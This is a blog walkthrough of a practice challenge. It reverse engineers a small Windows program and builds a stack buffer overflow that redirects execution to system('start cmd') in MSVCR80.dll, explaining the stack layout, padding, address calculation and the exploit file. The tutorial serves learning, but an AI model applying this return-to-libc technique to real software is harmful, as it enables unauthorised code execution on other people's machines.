Hello again and welcome to my blog. I've recently
encountered a very nice riddle hitting BoF and RE fans at the same time. This
overwhelming riddle takes the trainee another step out of the box, testing he’s
capabilities in understanding how to Reverse Engineer a program and maliciously
execute a Buffer Overflow exploit. Stay tuned :P
Let’s take a look at the simple executable:
What this innocent file does is legitimately asking a
question, waiting for the user to enter reply with his name.
Entering a name will save the string in the stack as a local
variable and recall it to the command line as text.
**That’s the right time to say that if you don’t know
what RE or BoF is, it will be best if you research a bit about the two and come
back when you’re better prepared.
Long story short, RE is of course Reverse-Engineering, the
art of crafting a program in a way that a malicious user or a programmer could inject malicious input or extend its functionality respectively. Extending functionality can of course at the same time be to exploit the program to things it’s not supposed to do.
BoF is a short for an vulnerability called – Buffer Overflow. This "bug" is characterized by an injection of malicious string into a program, forcing it
to “step out” of its allocated buffer in order to rewrite memory variables and
saved areas in a way that will cause a failure or a malicious script to execute.
There are multiple ways to exploit this vulnerability. We’ll be
focusing on Stack BoF.
Here’s the deal:
From left to right – Let’s say I wrote a code saying I would
like to create a char c[12] array, and initialize
it to “hello”;. The stack will look something like the second
image.
If you’ll notice the green and red areas – those are the
saved areas for the Frame Pointer and the Return Address. Those two
are very important, making sure we know where we are on the stack and
where to return to.
In my code I've also created a function that rewrites this
variable, but I didn't add any restrictions on how to write to this variable. This
mistake was expensive, causing a main() loop in the size of 200 ‘A’s to rewrite my
stack variable (see image 3) and exceed the buffer, also rewriting the Frame Pointer
and the Return Address. When my function will reach its retrun; command it will use the Return Address from the stack which has 0x41414141 (AAAA) in it. This address is of course not mapped and will cause an Access Violation. Windows crashes the application because the lack of an Exception Handler.
Now let’s take a minute to think what would of happened if a
malicious user could exploit this vulnerability and create a BoF in that program.
Well yeah, the program than crashed, Hacker is happy, but what else?
You’re right, if an attacker can overwrite the Return
Address to some REAL address in the Address Space, she can call a malicious code to
be executed from the stack. This is exactly what we are about to do!
First thing first, we need to use a disassembler to
virtually build the stack and see what exactly do we need in order to exploit
this executable.
**I’m using IDA pro (free version) and OllyDBG (IDA is static analysis while Olly
can analyze in run-time)
Here is our executable in the static code analysis tool. If
we look at the “View-A” window we can see our binary file laid out, row by row,
even though it says nothing about how it will be organized in the stack.
On the left of that window we can see the .text
representation : [address].
Starting from the first line: EBP is of course our Base
Pointer being initialize and mov (move) sets the Stack Pointer in its place
(the top of the stack, cause its empty). Then a subtract of 40h (Hex) is being
allocated on the stack and the Source Identifier is being pushed to mark
the start of a code section.
Then comes the printf() function and its content (mov, push, call).
User then inputs a var_40+ebp content into register ‘A’ (eax) and the push
stores it in the stack. After this action, the program automatically calls gets()
function with the offset of “Hello” and calls (prints) the data stored in var_40+ebp,
which is of course the user’s input and prints the rest of the sentence.
Now we know our Stack looks as followed:
40 Hex stack variables
|
4 Dec – Frame Pointer
|
4 Dec – Return Address
|
What I would like to do is to overwrite the whole stack. The
problem is that if I’ll do that, the stack will have no Return Address and then
I won’t be able to execute my malicious code. To solve this issue I’ll need to
create a new/custom Frame Pointer and Return Address so the program will logically run
with no errors, keeping the stack in a correct structure.
Here is what I’m about to do:
|
|||
My
Frame Pointer
|
|||
My
Return Address
|
Now that I know what I want to do I need to calculate
exactly how much garbage I would like to inject into the program in order to
get it to write the new Return Address in the right place. Once I got there, the second
step will be to pour an address into my Return Address, which will instantly
take me to my malicious code.
Oppsss… wait a second. Take a look at the program again:
Scrolling down the Strings window we can see that the file
uses a DLL called MSVCR80.dll which maybe indicates that the program is using this DLL. Looking at the DependencyWalker (next screenshot) we can confirm our suspicion. (next to the red '1').
Let’s check Google for this file’s capabilities, so maybe we
can spare calling a malicious DLL, and leverage the attack by calling some
function from a legitimate DLL the program uses.
Looking quickly into Google I found that - ”msvcr80.dll is a module associated with
Microsoft Visual Studio 2005 from Microsoft Corporation. It is the Microsoft C
Runtime Library and is used by programs written with Microsoft Visual Studio
2005.”
Conclusions is that maybe this DLL has system()
or _execv() capabilities. Using DependencyWalker we would try and find
the base address this DLL loads from and find the relative offset of this
functions. Here is what I found:
The DLL loads from 0x78130000 and the offset to the system()
function is 0x003009B, means we need to add the one to the other using a Hex
calculator:
Go to calc.exe (startàrunàcalc) and View as
Programmer (Alt+3). Switch Decimal to Hex in the upper left wing of the calculator
and simply input the two addresses:
Now we know that in order to call the system() we
need to create an overflow in the stack, build some random (4 decimal) Frame
Pointer that we won’t be even using so we don’t care about its content and concatenate
in with the address to the loaded function, exactly as we calculated right now.
But wait, don’t we missing something? Let’s see again:
1)
Overflow the program –
check!
2)
Create a new Frame Pointer
and Return Address to keep stack logic structure – check!
3)
Pour into the Return
Address our call for the system() function from its original address –
check!
Ohh… we’re missing the system()’s argument!
Now we need to find a way to create a pointer to the place
where we put our argument. The argument for this example will be “start cmd”, which
will open a new Command Line window, waiting for you to maliciously take over
the machine.
Keep a close eye because that’s a tricky one. Here’s how the
stack should look like:
Stack abstract Stack input
|
|||
My Frame Pointer
|
|||
My Return Address
|
|||
Pointer to command
address
|
|||
malicious command |
|
|||
BBBB
|
|||
78
16 00 9B
|
|||
Some
pointer
|
|||
“start
cmd”
|
**Notice that when we’re injecting addresses we’re using “Little
Endian”, which basically says we need to write the address backwards, but keep
the Hex. Example: 00 B7 78 16 à
16 78 B7 00
To get the pointer we cannot use IDA pro, because IDA, as we
said earlier, is a static binary analysis. If we like to dynamically analyze
the code we need a tool that can make this magic happened.
OllyDBG is exactly what we need (you can also use Immunity
Debugger or alike).
Why do we need to analyze the program in run-time?
The thing is that we want to know the address of our new
code, which will only be created after we run the program and input our string.
Here is the next procedure:
Now we would like to execute the file, input the string that
causes the overflow and calculate exactly where the call to system()
should end.
Starting the program we can see the binary, and by holding
the step over button (F8), until it automatically stops, we get to the
following address – 00 18 FF 4C:
This address is of course the location where the user
supposed to insert his input. If we’ll look at the Command Line prompt we
should see:
Now we have everything we need but a comfortable editor to
write our exploit in.
I recommend a nice editor called HxD, but you can
also use Hex Editor Neo and others.
Our exploit should look as following:
40Hex (stack variables) + 10Hex (4 Dec Frame Pointer + 4 Dec
Return Add + 4 Dec New FP) + MSVCR80.DLL address (system() location) +
4Hex pointer + system command (start cmd)
This how it looks in the HxD:
**Notice that addresses are supposed to be written in the Hex (left) side while ASCII are being written in the Decimal side (right).
Let’s save this file as exploit.dat and do the following:
1)
Open Command Line
2)
Go to overFlowMe.exe
location
3)
Run the following command:
overFlowMe.exe < c:\filepath\exploit.dat
a.
This command will execute
the .exe file and when user-input call initiates, the exploit content will be
poured into the gets() location, exploiting the program.
But wait… we got an
error:
Why is that?! We did everything as it supposed to be…
Do you have any idea?
Well I’ve encountered this error and after a quick brain
storming with myself I understood that it has to be one of the three options:
1)
Something is wrong in the
overflow
a.
Countermeasure – calculated
everything again. It went out exactly the same.
2)
Something is wrong with the
return address – could be.
3)
Something is wrong with the
pointer – couldn't be. If it was a pointer issue the error was different. Trust
me on that for now.
Eliminating (1) and (3), I started checking whether the
address is wrong. A quick consultation with a friend got me to a very interesting
solution. My friend told me that the DependencyWalker only displays a preferred
address and that I better double check it in the OllyDBG and so I did.
Here is what I did:
1)
Open Olly and click on the ‘M’
(Memory) button.
2)
A window will open, with an
organized table containing everything you need to know about your stack memory.
3)
Look for your DLL under the
“owner” column and check what address it is load from.
4)
In the following image we
can see that MSVCR80.DLL PE header is being load from – 74 B0 00 00
Now let’s correct our exploit:
74 B0 00 00 + 00 03 00 9B = 74 B3 00 9B
** 00 03 00 9B is the offset to system() remember?
Let’s rerun overFlowMe.exe < c:\filepath\exploit.dat
Again an error!
Well now the error is very clear. The pointer is wrong, and
the system() gets a command it does not understand. It is equal to – c:\>wrong
windows command
Error: “‘wrong’ is not recognized as an internal or
external command…”
What is missing?
If we look at the error we see that system() tried to
execute a code from our exploit only it executed too early in the code.
Going back to Olly and double clicking the address column on
the bottom right table we see that we are in the wrong offset by 8. Double clicking
again to go back to the addresses represented by ‘==>’ will probably show us
the right address that will execute the right code section.
The address near ‘==>’ is 00 18 FF 54
**don’t forget “Little Endian”
Let’s rewrite the exploit again and see if that fixed our
error.
Executing the .exe again with our exploits gives us the
following:
Viola! We got it. Our exploit worked!
We managed to create a Buffer Overflow, rebuild the stack
and execute system(“start cmd”);
Hope you've enjoyed (:
No comments:
Post a Comment